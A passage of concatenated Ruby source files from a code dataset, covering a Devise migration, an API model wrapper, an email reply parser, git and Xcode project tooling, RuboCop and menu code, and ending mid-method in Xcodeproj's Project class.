# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 41.783505 | 245 | 0.683876 |
26d15b67ac9ec8ae80cc509181534ca2f25b271f | 1,430 | class DeviseCreateUsers < ActiveRecord::Migration[4.2]
def change
create_table(:users) do |t|
## Database authenticatable
t.string :email, null: false, default: ""
t.string :encrypted_password, null: false, default: ""
## Recoverable
t.string :reset_password_token
t.datetime :reset_password_sent_at
## Rememberable
t.datetime :remember_created_at
## Trackable
t.integer :sign_in_count, default: 0
t.datetime :current_sign_in_at
t.datetime :last_sign_in_at
t.string :current_sign_in_ip
t.string :last_sign_in_ip
## Confirmable
# t.string :confirmation_token
# t.datetime :confirmed_at
# t.datetime :confirmation_sent_at
# t.string :unconfirmed_email # Only if using reconfirmable
## Lockable
# t.integer :failed_attempts, :default => 0 # Only if lock strategy is :failed_attempts
# t.string :unlock_token # Only if unlock strategy is :email or :both
# t.datetime :locked_at
## Token authenticatable
# t.string :authentication_token
t.timestamps
end
add_index :users, :email, unique: true
add_index :users, :reset_password_token, unique: true
# add_index :users, :confirmation_token, :unique => true
# add_index :users, :unlock_token, :unique => true
# add_index :users, :authentication_token, :unique => true
end
end
| 31.086957 | 94 | 0.665035 |
ff3f86f53967930cbff0b42c92290abe59dba07d | 2,097 | require 'fulfil/query'
module Fulfil
  # Convenience wrapper around a Fulfil client scoped to a single model
  # name, so callers don't have to repeat the model on every request.
  class Model
    attr_reader :model_name

    # @param client [#find, #search, #count] API client used for requests
    # @param model_name [String] Fulfil model identifier, e.g. "sale.sale"
    def initialize(client:, model_name:)
      @client = client
      @model_name = model_name
      # Plain assignment: a freshly constructed instance never has @query set,
      # so the previous `||=` was a no-op.
      @query = Fulfil::Query.new
    end

    # Delegate to the client, including the model_name so we don't have to
    # type it every time.
    def find(model: model_name, id:)
      @client.find(model: model, id: id)
    end

    # Delegate to the client, including the model_name so we don't have to
    # type it every time.
    def search(
      model: model_name,
      domain:,
      fields: %w[id rec_name],
      limit: nil,
      offset: nil,
      sort: nil
    )
      @client.search(
        model: model,
        domain: domain,
        fields: fields,
        limit: limit,
        offset: offset,
        sort: sort
      )
    end

    # Number of records matching +domain+.
    def count(domain:)
      @client.count(model: model_name, domain: domain)
    end

    # All records matching the currently accumulated query.
    def all
      search(domain: query)
    end

    # Returns the accumulated query domain. Any keyword arguments are first
    # merged into the underlying Fulfil::Query.
    def query(**args)
      @query.search(**args) if args.any?
      @query.query
    end

    # Fetches one record to expose the model's full attribute set.
    # Returns {} when the model has no records instead of raising
    # NoMethodError on nil (previous behavior).
    def attributes
      results = @client.search(model: model_name, domain: [], limit: 1)
      return {} if results.nil? || results.empty?

      @client.find(model: model_name, id: results.first['id'])
    end

    # Bulk-loads the records referenced by +source_key+ (dot-separated path
    # of hash keys) on each of +models+ and replaces the raw id lists in
    # place with the loaded records. Returns [] when nothing is referenced;
    # otherwise returns +models+.
    def fetch_associated(models:, association_name:, source_key:, fields:)
      source_keys = source_key.split('.')
      associated_ids =
        models.map { |model| model.dig(*source_keys) }.flatten.compact.uniq
      return [] if associated_ids.none?

      associated_models =
        @client.find(
          model: association_name, ids: associated_ids, fields: fields
        )
      associated_models_by_id = associated_models.map { |m| [m['id'], m] }.to_h

      models.each do |model|
        filtered_models =
          model.dig(*source_keys).map { |id| associated_models_by_id[id] }

        if source_keys.length > 1
          model.dig(*source_keys[0..-2]).store(
            source_keys.last,
            filtered_models
          )
        else
          model[source_keys.first] = filtered_models
        end
      end
    end
  end
end
| 24.103448 | 79 | 0.595613 |
e2e8302488bebe77f3b9e6491b2465a91fe46327 | 1,476 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
# Verifies that the RelatesFilterDependencyRepresenter satisfies the shared
# 'relation filter dependency' example group.
describe ::API::V3::Queries::Schemas::RelatesFilterDependencyRepresenter, clear_cache: true do
  it_behaves_like 'relation filter dependency' do
    # Concrete filter under test; `query` is presumably supplied by the
    # shared example context — confirm against the shared examples.
    let(:filter) { Queries::WorkPackages::Filter::RelatesFilter.create!(context: query) }
  end
end
| 41 | 94 | 0.76626 |
e81cbcbc96d1f83dcf1bd6ec860e93fcbb8e8172 | 8,101 | require 'strscan'
# EmailReplyParser is a small library to parse plain text email content. The
# goal is to identify which fragments are quoted, part of a signature, or
# original body content. We want to support both top and bottom posters, so
# no simple "REPLY ABOVE HERE" content is used.
#
# Beyond RFC 5322 (which is handled by the [Ruby mail gem][mail]), there aren't
# any real standards for how emails are created. This attempts to parse out
# common conventions for things like replies:
#
# this is some text
#
# On <date>, <author> wrote:
# > blah blah
# > blah blah
#
# ... and signatures:
#
# this is some text
#
# --
# Bob
# http://homepage.com/~bob
#
# Each of these are parsed into Fragment objects.
#
# EmailReplyParser also attempts to figure out which of these blocks should
# be hidden from users.
#
# [mail]: https://github.com/mikel/mail
class EmailReplyParser
  VERSION = "0.5.9"

  # Public: Splits an email body into a list of Fragments.
  #
  # text - A String email body.
  #
  # Returns an Email instance.
  def self.read(text)
    Email.new.read(text)
  end

  # Public: Get the text of the visible portions of the given email body.
  #
  # text - A String email body.
  #
  # Returns a String.
  def self.parse_reply(text)
    self.read(text).visible_text
  end

  ### Emails

  # An Email instance represents a parsed body String.
  class Email
    # Emails have an Array of Fragments.
    attr_reader :fragments

    def initialize
      @fragments = []
    end

    # Public: Gets the combined text of the visible fragments of the email body.
    #
    # Returns a String.
    def visible_text
      fragments.select{|f| !f.hidden?}.map{|f| f.to_s}.join("\n").rstrip
    end

    # Splits the given text into a list of Fragments.  This is roughly done by
    # reversing the text and parsing from the bottom to the top.  This way we
    # can check for 'On <date>, <author> wrote:' lines above quoted blocks.
    #
    # text - A String email body.
    #
    # Returns this same Email instance.
    def read(text)
      text = text.dup

      # Normalize line endings.
      text.gsub!("\r\n", "\n")

      # Check for multi-line reply headers. Some clients break up
      # the "On DATE, NAME <EMAIL> wrote:" line into multiple lines.
      if text =~ /^(?!On.*On\s.+?wrote:)(On\s(.+?)wrote:)$/m
        # Remove all new lines from the reply header.
        text.gsub! $1, $1.gsub("\n", " ")
      end

      # Some users may reply directly above a line of underscores.
      # In order to ensure that these fragments are split correctly,
      # make sure that all lines of underscores are preceded by
      # at least two newline characters.
      text.gsub!(/([^\n])(?=\n_{7}_+)$/m, "\\1\n")

      # The text is reversed initially due to the way we check for hidden
      # fragments.  From here on, every line and regex operates on
      # reversed strings until finish_fragment un-reverses the content.
      text = text.reverse

      # This determines if any 'visible' Fragment has been found.  Once any
      # visible Fragment is found, stop looking for hidden ones.
      @found_visible = false

      # This instance variable points to the current Fragment.  If the matched
      # line fits, it should be added to this Fragment.  Otherwise, finish it
      # and start a new Fragment.
      @fragment = nil

      # Use the StringScanner to pull out each line of the email content.
      @scanner = StringScanner.new(text)
      while line = @scanner.scan_until(/\n/)
        scan_line(line)
      end

      # Be sure to parse the last line of the email.
      if (last_line = @scanner.rest.to_s).size > 0
        scan_line(last_line)
      end

      # Finish up the final fragment.  Finishing a fragment will detect any
      # attributes (hidden, signature, reply), and join each line into a
      # string.
      finish_fragment

      @scanner = @fragment = nil

      # Now that parsing is done, reverse the order.
      @fragments.reverse!
      self
    end

  private
    EMPTY = "".freeze

    # Matches reversed signature markers: '--'/'__' delimiter lines, a
    # word ending in '-', or a reversed "Sent from my <device>" line
    # (':etorw' style — the text is reversed at this point).
    SIGNATURE = '(?m)(--\s*$|__\s*$|\w-$)|(^(\w+\s*){1,3} ym morf tneS$)'

    # Use the much faster re2 engine when available, falling back to the
    # built-in Regexp otherwise.
    begin
      require 're2'
      SIG_REGEX = RE2::Regexp.new(SIGNATURE)
    rescue LoadError
      SIG_REGEX = Regexp.new(SIGNATURE)
    end

    ### Line-by-Line Parsing

    # Scans the given line of text and figures out which fragment it belongs
    # to.
    #
    # line - A String line of text from the email.
    #
    # Returns nothing.
    def scan_line(line)
      line.chomp!("\n")
      # NOTE: the line is reversed, so lstrip! strips what was originally
      # trailing whitespace; signature-looking lines are left untouched so
      # the end-anchored signature pattern still matches.
      line.lstrip! unless SIG_REGEX.match(line)

      # We're looking for leading `>`'s to see if this line is part of a
      # quoted Fragment (they appear at the end because the line is reversed).
      is_quoted = !!(line =~ /(>+)$/)

      # Mark the current Fragment as a signature if the current line is empty
      # and the Fragment starts with a common signature indicator.
      if @fragment && line == EMPTY
        if SIG_REGEX.match @fragment.lines.last
          @fragment.signature = true
          finish_fragment
        end
      end

      # If the line matches the current fragment, add it.  Note that a common
      # reply header also counts as part of the quoted Fragment, even though
      # it doesn't start with `>`.
      if @fragment &&
          ((@fragment.quoted? == is_quoted) ||
           (@fragment.quoted? && (quote_header?(line) || line == EMPTY)))
        @fragment.lines << line

      # Otherwise, finish the fragment and start a new one.
      else
        finish_fragment
        @fragment = Fragment.new(is_quoted, line)
      end
    end

    # Detects if a given line is a header above a quoted area.  It is only
    # checked for lines preceding quoted regions.  The patterns are reversed:
    # ':etorw...nO' is 'On...wrote:' and the capture group covers reversed
    # 'From/Sent/To/Subject' labels.
    #
    # line - A String line of text from the email.
    #
    # Returns true if the line is a valid header, or false.
    def quote_header?(line)
      line =~ /^:etorw.*nO$/ || line =~ /^.*:(morF|tneS|oT|tcejbuS)$/
    end

    # Builds the fragment string and reverses it, after all lines have been
    # added.  It also checks to see if this Fragment is hidden.  The hidden
    # Fragment check reads from the bottom to the top.
    #
    # Any quoted Fragments or signature Fragments are marked hidden if they
    # are below any visible Fragments.  Visible Fragments are expected to
    # contain original content by the author.  If they are below a quoted
    # Fragment, then the Fragment should be visible to give context to the
    # reply.
    #
    #     some original text (visible)
    #
    #     > do you have any two's? (quoted, visible)
    #
    #     Go fish! (visible)
    #
    #     > --
    #     > Player 1 (quoted, hidden)
    #
    #     --
    #     Player 2 (signature, hidden)
    #
    def finish_fragment
      if @fragment
        @fragment.finish
        if !@found_visible
          if @fragment.quoted? || @fragment.signature? ||
              @fragment.to_s.strip == EMPTY
            @fragment.hidden = true
          else
            @found_visible = true
          end
        end
        @fragments << @fragment
      end
      @fragment = nil
    end
  end

  ### Fragments

  # Represents a group of paragraphs in the email sharing common attributes.
  # Paragraphs should get their own fragment if they are a quoted area or a
  # signature.
  class Fragment < Struct.new(:quoted, :signature, :hidden)
    # This is an Array of String lines of content.  Since the content is
    # reversed, this array is backwards, and contains reversed strings.
    attr_reader :lines,

      # This is reserved for the joined String that is build when this Fragment
      # is finished.
      :content

    def initialize(quoted, first_line)
      self.signature = self.hidden = false
      self.quoted = quoted
      @lines = [first_line]
      @content = nil
      @lines.compact!
    end

    alias quoted? quoted
    alias signature? signature
    alias hidden? hidden

    # Builds the string content by joining the lines and reversing them,
    # restoring the original reading order.
    #
    # Returns nothing.
    def finish
      @content = @lines.join("\n")
      @lines = nil
      @content.reverse!
    end

    def to_s
      @content
    end

    def inspect
      to_s.inspect
    end
  end
end
| 29.245487 | 80 | 0.624985 |
ab61ddd9cfbf4e996a28be28d1051aec89177669 | 1,518 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'git-process/git_process'
module GitProc

  # git-process command that creates a new feature branch off the
  # integration branch, or off '_parking_' when the parking branch holds
  # work not yet contained in the integration branch.
  class NewFeatureBranch < Process

    # @param dir [String] working directory of the repository
    # @param opts [Hash] expects :branch_name for the new branch and
    #   :local to skip fetching from the remote; remaining handling is
    #   delegated to Process#initialize via `super`.
    def initialize(dir, opts)
      @branch_name = opts[:branch_name]
      @local_only = opts[:local]
      super
    end

    # Creates and checks out the new branch, sets its upstream to the
    # integration branch, and deletes '_parking_' if we branched from it.
    # Returns the new branch.
    def runner
      mybranches = gitlib.branches()
      on_parking = (mybranches.parking == mybranches.current)

      # Branch from '_parking_' only when it has commits the integration
      # branch does not already contain.
      base_branch = if on_parking and not mybranches[config.integration_branch].contains_all_of(mybranches.parking.name)
        '_parking_'
      else
        config.integration_branch
      end

      gitlib.fetch if gitlib.has_a_remote? and not @local_only
      logger.info { "Creating #{@branch_name} off of #{base_branch}" }
      new_branch = gitlib.checkout(@branch_name, :new_branch => base_branch)
      branches = gitlib.branches()
      branches[@branch_name].upstream(config.integration_branch)
      # The parking branch's work now lives on the new branch.
      branches.parking.delete! if on_parking
      new_branch
    end
  end
end
| 30.36 | 120 | 0.689723 |
e86e5d851be3b05973d78b18c97c76a3129ee53f | 1,473 | # frozen_string_literal: true
module RuboCop
  module Cop
    # Provides functionality for checking whether names with trailing
    # numbers match the configured EnforcedStyle.
    module ConfigurableNumbering
      include ConfigurableEnforcedStyle

      SNAKE_CASE = /(?:[a-z_]|_\d+)$/
      NORMAL_CASE = /(?:_\D*|[A-Za-z]\d*)$/
      NON_INTEGER = /[A-Za-z_]$/

      # Records an offense on +name_range+ unless +name+ matches the
      # configured numbering style; operator methods are exempt.
      def check_name(node, name, name_range)
        return if operator?(name)
        return correct_style_detected if valid_name?(node, name)

        add_offense(node, name_range, message(style))
      end

      # True when +name+ satisfies the configured style, or when it is a
      # class emitter method (see below).
      def valid_name?(node, name)
        pattern =
          case style
          when :snake_case  then SNAKE_CASE
          when :normalcase  then NORMAL_CASE
          when :non_integer then NON_INTEGER
          end

        name.match(pattern) || class_emitter_method?(node, name)
      end

      # A class emitter method is a singleton method in a class/module, where
      # the method has the same name as a class defined in the class/module.
      def class_emitter_method?(node, name)
        return false unless node.parent && node.defs_type?

        # a class emitter method may be defined inside `def self.included`,
        # `def self.extended`, etc.
        node = node.parent while node.parent.defs_type?
        node.parent.each_child_node(:class).any? { |klass| klass.loc.name.is?(name.to_s) }
      end
    end
  end
end
| 28.326923 | 77 | 0.610319 |
39eea38318a89b89297ba9e4f1ed9fe79beda234 | 772 | require 'forwardable'
require 'flat_hash/directory'
require 'flat_hash/git'
require 'flat_hash/hg'
# Version-controlled variant of FlatHash::Directory: detects a Git or
# Mercurial checkout and exposes its history for stored elements.
class FlatHash::Repository < FlatHash::Directory
  extend Forwardable

  # Raw VCS operations are forwarded straight to the detected backend.
  def_delegators :@vcs, :changesets, :addremovecommit

  def initialize serialiser, path
    super
    # Backend detection is based on the current working directory;
    # @vcs stays nil when neither metadata directory is present.
    @vcs = FlatHash::Git.new if File.exist?('.git')
    @vcs = FlatHash::Hg.new if File.exist?('.hg')
  end

  # Whether a VCS backend was detected at construction time.
  def vcs_supported?
    @vcs != nil
  end

  # Changesets touching +key+ (or the whole store when +key+ is nil),
  # as reported by the backend. Empty when no VCS is available.
  def history key=nil
    return [] unless vcs_supported?

    target = key ? File.join(@path, key) : @path
    @vcs.changesets(target).map { |id| @vcs.changeset(id) }
  end

  # The deserialised element +key+ as of +changeset+; {} without a VCS.
  def element_at changeset, key
    return {} unless vcs_supported?

    raw = @vcs.content_at(File.join(@path, key), changeset)
    @serialiser.read(StringIO.new(raw))
  end
end
6ad89d3d5bebc92101e8ac878fdc09ccbb18c7dd | 936 | # frozen_string_literal: true
require 'test/unit'
require_relative '../Core/menu'
# Tests for the Menu classes (Menu, MainMenu, GameMenu)
class MenuTest < Test::Unit::TestCase
  # Fresh two-option menu before every test.
  def setup
    @menu = Menu.new(%w[Start Exit], 'Normal')
  end

  def test_options_initialized
    assert_equal(@menu.options, %w[Start Exit])
  end

  def test_title_initialized
    assert_equal(@menu.title, 'Normal')
  end

  # The selection cursor starts on the first option.
  def test_index_initialized
    assert_equal(@menu.current_index, 0)
  end

  def test_correct_option
    assert_equal(@menu.current_option, 'Start')
  end

  # MainMenu/GameMenu provide their own fixed titles and option lists.
  def test_main_menu_initializes
    menu = MainMenu.new(nil, nil)
    assert_equal(menu.title, 'Main Menu')
    assert_equal(menu.options, ['Start Game', 'Controls', 'Help', 'More Info', 'Exit'])
  end

  def test_game_menu_initializes
    menu = GameMenu.new(nil, nil)
    assert_equal(menu.title, 'Game Menu')
    assert_equal(menu.options, ['Continue', 'Controls', 'Help', 'Main Menu'])
  end
end
| 23.4 | 87 | 0.706197 |
289dcca77af7c06cf99c1bcf5a6d3fc3830dbcab | 796 | module ApplicationHelper
def divide_in_chunks(arr, chunk_size)
chunks = {}
chunk_idx = 0
arr.each_with_index do |item,idx|
chunks[chunk_idx] ||= []
chunks[chunk_idx] << item
if (idx+1)%chunk_size == 0
chunk_idx=chunk_idx+1
end
end
chunks
end
def gravatar_url(user)
"http://www.gravatar.com/avatar/#{Digest::MD5.hexdigest(user.email.downcase)}?s=40"
end
def select_collection_rating_values
Review.rating_range.to_a.reverse.map do |rating|
[ pluralize(rating, 'star'), rating]
end
end
def select_collection_category_values
Category.all.map do |category|
[ category.name, category.id ]
end
end
def select_rating_values
(0.0..5.0).step(0.1).map(&Proc.new{ |v| v.round(2).to_f })
end
end
| 22.111111 | 87 | 0.654523 |
4aec938a5840327013ea9944ef8ada83e0b01535 | 24,711 | require 'fileutils'
require 'securerandom'
require 'xcodeproj/project/object'
require 'xcodeproj/project/project_helper'
require 'xcodeproj/plist_helper'
module Xcodeproj
# This class represents a Xcode project document.
#
# It can be used to manipulate existing documents or even create new ones
# from scratch.
#
# An Xcode project document is a plist file where the root is a dictionary
# containing the following keys:
#
# - archiveVersion: the version of the document.
# - objectVersion: the version of the objects description.
# - classes: a key that apparently is always empty.
# - objects: a dictionary where the UUID of every object is associated to
# its attributes.
# - rootObject: the UUID identifier of the root object ({PBXProject}).
#
# Every object is in turn a dictionary that specifies an `isa` (the class of
# the object) and in accordance to it maintains a set attributes. Those
# attributes might reference one or more other objects by UUID. If the
# reference is a collection, it is ordered.
#
# The {Project} API returns instances of {AbstractObject} which wrap the
# objects described in the Xcode project document. All the attributes types
# are preserved from the plist, except for the relationships which are
# replaced with objects instead of UUIDs.
#
# An object might be referenced by multiple objects, an when no other object
# is references it, it becomes unreachable (the root object is referenced by
# the project itself). Xcodeproj takes care of adding and removing those
# objects from the `objects` dictionary so the project is always in a
# consistent state.
#
class Project
include Object
# @return [Pathname] the path of the project.
#
attr_reader :path
# @param [Pathname, String] path @see path
#        The path provided will be expanded to an absolute path.
# @param [Bool] skip_initialization
#        Whether the project should be initialized from scratch.
# @param [Int] object_version
#        Object version to use for serialization, defaults to Xcode 3.2 compatible.
#
# @raise [ArgumentError] If skip_initialization is not a boolean.
#
# @example Creating a project
#   Project.new("path/to/Project.xcodeproj")
#
def initialize(path, skip_initialization = false, object_version = Constants::DEFAULT_OBJECT_VERSION)
  # Validate arguments before doing any work so a bad call cannot leave a
  # half-initialized instance behind (this check previously ran last,
  # after initialize_from_scratch had already mutated state).
  unless skip_initialization.is_a?(TrueClass) || skip_initialization.is_a?(FalseClass)
    raise ArgumentError, '[Xcodeproj] Initialization parameter expected to ' \
      "be a boolean #{skip_initialization}"
  end

  @path = Pathname.new(path).expand_path
  @objects_by_uuid = {}
  @generated_uuids = []
  @available_uuids = []

  unless skip_initialization
    initialize_from_scratch
    @object_version = object_version.to_s
  end
end
# Opens the project at the given path.
#
# @param [Pathname, String] path
#        The path to the Xcode project document (xcodeproj), resolved
#        relative to the current working directory.
#
# @raise If the project versions are more recent than the ones known to
#        Xcodeproj, to prevent it from corrupting existing projects.
#
# @raise If it can't find the root object. This means that the project is
#        malformed.
#
# @example Opening a project
#   Project.open("path/to/Project.xcodeproj")
#
def self.open(path)
  absolute_path = Pathname.pwd + path
  raise "[Xcodeproj] Unable to open `#{absolute_path}` because it doesn't exist." unless absolute_path.exist?

  project = new(absolute_path, true)
  project.send(:initialize_from_file)
  project
end
# @return [String] the archive version.
#
attr_reader :archive_version
# @return [Hash] an dictionary whose purpose is unknown.
#
attr_reader :classes
# @return [String] the objects version.
#
attr_reader :object_version
# @return [Hash{String => AbstractObject}] A hash containing all the
# objects of the project by UUID.
#
attr_reader :objects_by_uuid
# @return [PBXProject] the root object of the project.
#
attr_reader :root_object
# A fast way to see if two {Project} instances refer to the same projects on
# disk. Use this over {#eql?} when you do not need to compare the full data.
#
# This shallow comparison was chosen as the (common) `==` implementation,
# because it was too easy to introduce changes into the Xcodeproj code-base
# that were slower than O(1).
#
# @return [Boolean] whether or not the two `Project` instances refer to the
#         same projects on disk, determined solely by {#path} and
#         `root_object.uuid` equality.
#
# @note Returns `nil` (falsy) rather than `false` when `other` is nil,
#       because the leading `other &&` short-circuits.
#
# @todo If ever needed, we could also compare `uuids.sort` instead.
#
def ==(other)
  other && path == other.path && root_object.uuid == other.root_object.uuid
end
# Compares the project to another one, or to a plist representation.
#
# @note This operation can be extremely expensive, because it converts a
#       `Project` instance to a hash, and should _only_ ever be used to
#       determine whether or not the data contents of two `Project` instances
#       are completely equal.
#
#       To simply determine whether or not two {Project} instances refer to
#       the same projects on disk, use the {#==} method instead.
#
# @param [#to_hash] other the object to compare.
#
# @return [Boolean] whether the project is equivalent to the given object.
#
def eql?(other)
  other.respond_to?(:to_hash) && to_hash == other.to_hash
end
def to_s
"#<#{self.class}> path:`#{path}` UUID:`#{root_object.uuid}`"
end
alias_method :inspect, :to_s
public
# @!group Initialization
#-------------------------------------------------------------------------#
# Initializes the instance from scratch.
#
# Builds the minimal object graph: a PBXProject root with a main group,
# a 'Products' group, a configuration list with Debug/Release
# configurations (Release as default) and an empty 'Frameworks' group.
def initialize_from_scratch
  @archive_version = Constants::LAST_KNOWN_ARCHIVE_VERSION.to_s
  @classes = {}

  # Drop the reference to any previous root object so it can be released
  # from the objects hash before installing the new one.
  root_object.remove_referrer(self) if root_object
  @root_object = new(PBXProject)
  root_object.add_referrer(self)

  root_object.main_group = new(PBXGroup)
  root_object.product_ref_group = root_object.main_group.new_group('Products')

  config_list = new(XCConfigurationList)
  root_object.build_configuration_list = config_list
  config_list.default_configuration_name = 'Release'
  config_list.default_configuration_is_visible = '0'
  add_build_configuration('Debug', :debug)
  add_build_configuration('Release', :release)

  new_group('Frameworks')
end
# Initializes the instance with the project stored in the `path` attribute.
#
# Reads `project.pbxproj`, rebuilds the object graph from its plist and
# refuses to proceed if the document uses versions newer than the ones
# this library knows, to avoid corrupting the project on save.
def initialize_from_file
  pbxproj_path = path + 'project.pbxproj'
  plist = Xcodeproj.read_plist(pbxproj_path.to_s)
  root_object.remove_referrer(self) if root_object
  @root_object = new_from_plist(plist['rootObject'], plist['objects'], self)
  @archive_version = plist['archiveVersion']
  @object_version = plist['objectVersion']
  @classes = plist['classes']

  unless root_object
    raise "[Xcodeproj] Unable to find a root object in #{pbxproj_path}."
  end

  if archive_version.to_i > Constants::LAST_KNOWN_ARCHIVE_VERSION
    raise '[Xcodeproj] Unknown archive version.'
  end

  if object_version.to_i > Constants::LAST_KNOWN_OBJECT_VERSION
    raise '[Xcodeproj] Unknown object version.'
  end
end
public
# @!group Plist serialization
#-------------------------------------------------------------------------#
# Creates a new object from the given UUID and `objects` hash (of a plist).
#
# The method sets up any relationship of the new object, generating the
# destination object(s) if not already present in the project.
#
# @note This method is used to generate the root object
# from a plist. Subsequent invocation are called by the
# {AbstractObject#configure_with_plist}. Clients of {Xcodeproj} are
# not expected to call this method.
#
# @param [String] uuid
# The UUID of the object that needs to be generated.
#
# @param [Hash {String => Hash}] objects_by_uuid_plist
# The `objects` hash of the plist representation of the project.
#
# @param [Boolean] root_object
# Whether the requested object is the root object and needs to be
# retained by the project before configuration to add it to the
# `objects` hash and avoid infinite loops.
#
# @return [AbstractObject] the new object.
#
# @visibility private.
#
def new_from_plist(uuid, objects_by_uuid_plist, root_object = false)
  attributes = objects_by_uuid_plist[uuid]
  return unless attributes

  # Resolve the concrete AbstractObject subclass from the ISA string.
  isa_class = Object.const_get(attributes['isa'])
  fresh_object = isa_class.new(self, uuid)
  fresh_object.add_referrer(self) if root_object
  fresh_object.configure_with_plist(objects_by_uuid_plist)
  fresh_object
end
# @return [Hash] The plist-ready hash representation of the project.
#
def to_hash
  objects_dictionary = objects.each_with_object({}) do |object, dictionary|
    dictionary[object.uuid] = object.to_hash
  end
  {
    'objects'        => objects_dictionary,
    'archiveVersion' => archive_version.to_s,
    'objectVersion'  => object_version.to_s,
    'classes'        => classes,
    'rootObject'     => root_object.uuid,
  }
end
# Converts the objects tree to a hash in which references to other
# objects are replaced by those objects' own tree hashes. As a
# consequence the same object may appear multiple times and the
# information about uniqueness is lost.
#
# Designed to work in conjunction with {Hash#recursive_diff} to provide
# a complete, yet readable, diff of two projects *not* affected by
# differences in UUIDs.
#
# @return [Hash] a hash representation of the project different from the
#         plist one.
#
def to_tree_hash
  {
    'objects'        => {},
    'archiveVersion' => archive_version.to_s,
    'objectVersion'  => object_version.to_s,
    'classes'        => classes,
    'rootObject'     => root_object.to_tree_hash,
  }
end
# @return [Hash{String => Hash}] A hash suitable to display the project
#         to the user.
#
def pretty_print
  configurations = root_object.build_configuration_list.build_configurations
  sorted_configurations = configurations.sort_by(&:name)
  {
    'File References' => root_object.main_group.pretty_print.values.first,
    'Targets' => root_object.targets.map(&:pretty_print),
    'Build Configurations' => sorted_configurations.map(&:pretty_print),
  }
end
# Serializes the project in the xcodeproj format using the path provided
# during initialization or the given path (`xcodeproj` file). If a path is
# provided file references depending on the root of the project are not
# updated automatically, thus clients are responsible to perform any needed
# modification before saving.
#
# @param [String, Pathname] path
# The optional path where the project should be saved.
#
# @example Saving a project
#   project.save
#   project.save("path/to/NewProject.xcodeproj")
#
# @return [void]
#
def save(save_path = nil)
  destination = save_path || path
  FileUtils.mkdir_p(destination)
  Xcodeproj.write_plist(to_hash, File.join(destination, 'project.pbxproj'))
end
public
# @!group Creating objects
#-------------------------------------------------------------------------#
# Creates a new object with a suitable UUID.
#
# The object is only configured with the default values of the `:simple`
# attributes, for this reason it is better to use the convenience methods
# offered by the {AbstractObject} subclasses or by this class.
#
# @param [Class, String] klass
# The concrete subclass of AbstractObject for new object or its
# ISA.
#
# @return [AbstractObject] the new object.
#
def new(klass)
  # Accept either the class itself or its ISA string.
  klass = Object.const_get(klass) if klass.is_a?(String)
  fresh_object = klass.new(self, generate_uuid)
  fresh_object.initialize_defaults
  fresh_object
end
# Generates a UUID unique for the project.
#
# @note UUIDs are not guaranteed to be generated unique because we need
#       to trim the ones generated in the xcodeproj extension.
#
# @note Implementation detail: as objects usually are created serially,
#       this method draws from a pre-generated batch of collision-checked
#       UUIDs, so the search for collisions with known UUIDs (a
#       performance bottleneck) is performed less often.
#
# @return [String] A UUID unique to the project.
#
def generate_uuid
  # Loop rather than a single refill: an entire batch may be discarded
  # as colliding, leaving the pool empty again.
  generate_available_uuid_list while @available_uuids.empty?
  @available_uuids.shift
end
# @return [Array<String>] the list of all the generated UUIDs.
#
# @note Used for checking new UUIDs for duplicates with UUIDs already
# generated but used for objects which are not yet part of the
# `objects` hash but which might be added at a later time.
#
attr_reader :generated_uuids
# Pre-generates the given number of UUIDs. Useful for optimizing
# performance when the rough number of objects that will be created is
# known in advance.
#
# @param [Integer] count
#        the number of UUIDs that should be generated.
#
# @note This method might store fewer unique UUIDs than the given count,
#       because candidates colliding with known UUIDs are discarded.
#
# @return [void]
#
def generate_available_uuid_list(count = 100)
  # Array.new(count) yields exactly `count` candidates; the previous
  # `(0..count)` range produced one more than requested.
  new_uuids = Array.new(count) { SecureRandom.hex(12).upcase }
  uniques = new_uuids - (@generated_uuids + uuids)
  @generated_uuids += uniques
  @available_uuids += uniques
end
public
# @!group Convenience accessors
#-------------------------------------------------------------------------#
# @return [Array<AbstractObject>] all the objects of the project.
#
def objects
objects_by_uuid.values
end
# @return [Array<String>] all the UUIDs of the project.
#
def uuids
objects_by_uuid.keys
end
# @return [Array<AbstractObject>] all the objects of the project whose
#         class is exactly the given one (subclasses excluded).
#
def list_by_class(klass)
  objects.select { |candidate| candidate.instance_of?(klass) }
end
# @return [PBXGroup] the main top-level group.
#
def main_group
root_object.main_group
end
# @return [ObjectList<PBXGroup>] a list of all the groups in the
# project.
#
def groups
main_group.groups
end
# Returns a group at the given subpath relative to the main group.
#
# @example
#   frameworks = project['Frameworks']
#   frameworks.name #=> 'Frameworks'
#   main_group.children.include? frameworks #=> True
#
# @param [String] group_path
#        the subpath of the group relative to the main group.
#
# @return [PBXGroup] the group at the given subpath.
#
def [](group_path)
  main_group[group_path]
end
# @return [Array<PBXFileReference>] all the file references in the
#         project. Note that `grep` filters by class and returns a plain
#         Array, not an ObjectList.
#
def files
  objects.grep(PBXFileReference)
end
# Returns the file reference for the given absolute path.
#
# @param [#to_s] absolute_path
#        The absolute path of the file whose reference is needed.
#
# @return [PBXFileReference, nil] The file reference, or nil if no
#         reference matches the path.
#
# @raise [ArgumentError] if the given path is not absolute.
#
def reference_for_path(absolute_path)
  wanted = Pathname.new(absolute_path)
  unless wanted.absolute?
    raise ArgumentError, "Paths must be absolute #{absolute_path}"
  end

  objects.find do |object|
